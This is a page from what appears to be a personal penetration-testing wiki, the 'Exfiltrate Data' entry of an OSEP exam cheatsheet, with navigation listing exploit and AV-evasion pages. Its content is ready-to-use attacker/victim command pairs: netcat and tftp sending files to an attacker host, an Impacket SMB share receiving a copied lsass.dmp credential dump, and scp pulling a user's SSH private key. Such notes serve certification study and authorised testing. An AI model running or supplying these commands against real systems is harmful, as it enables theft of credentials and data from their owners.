Awesome Hackpuntes
  • Intro
  • My CVE
  • Exploit-DB
    • XMLBlueprint <= 16.191112 - XML External Entity Injection
    • Easy XML Editor <= 1.7.8 - XML External Entity Injection
    • winrar 5.80 64bit - Denial of Service
    • rConfig 3.9.2 - Remote Code Execution
    • XML Notepad 2.8.0.4 - XML External Entity Injection
    • IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
  • OWASP - EN
    • OWASP: Testing guide checklist
  • OWASP - ES
    • [INFO] RECOPILACIÓN DE INFORMACIÓN
    • [CONFIG] GESTIÓN DE CONFIGURACIÓN E IMPLEMENTACIÓN
    • OWASP: Guía de pruebas
  • Page 1
  • 🕵️OSEP Cheatsheet
    • Checklist
    • Online Tools
    • AV Evasion
    • File transfer
    • Exfiltrate Data
    • Interesting files
    • Network Forwarding
    • Tools
    • CRTO Cheat Sheet
    • Page
    • Page 3
    • Page 4
  • 📱Mobile Pentesting
  • 🤖Android
    • Page 2
  • 💸iOS
    • How to extract IPA from iOS device
Powered by GitBook
On this page
  • Netcat
  • Impacket
  • SCP
  • Python FTPlib

Was this helpful?

  1. OSEP Cheatsheet

Exfiltrate Data

Netcat

# Attacker
nc -lnvp 1234 > file.txt

# Victim
nc.exe -vn <attacker-ip> 1234 < file.txt

# Important: Always close the connection from the receiver to avoid losing the shell.

Impacket

# Attacker
sudo impacket-smbserver -comment "SHARE" TMP /home/<username>/smb -smb2support

# Victim
copy-item -path c:\windows\tasks\lsass.dmp \\<attacker-ip>\tmp\lsass.dmp

SCP

Download private key from user to my machine

scp <username>@<victim-ip>:/home/<username>/.ssh/id_rsa ~/.ssh/<username>.key

Python FTPlib

# pip install pyftpdlib
# Attacker
python -m pyftpdlib -p 21

# Victim
# Put file
tftp -i <attacker-ip> PUT file.txt
# Get file
tftp -i <attacker-ip> GET file.txt
PreviousFile transferNextInteresting files

Last updated 1 year ago

Was this helpful?

🕵️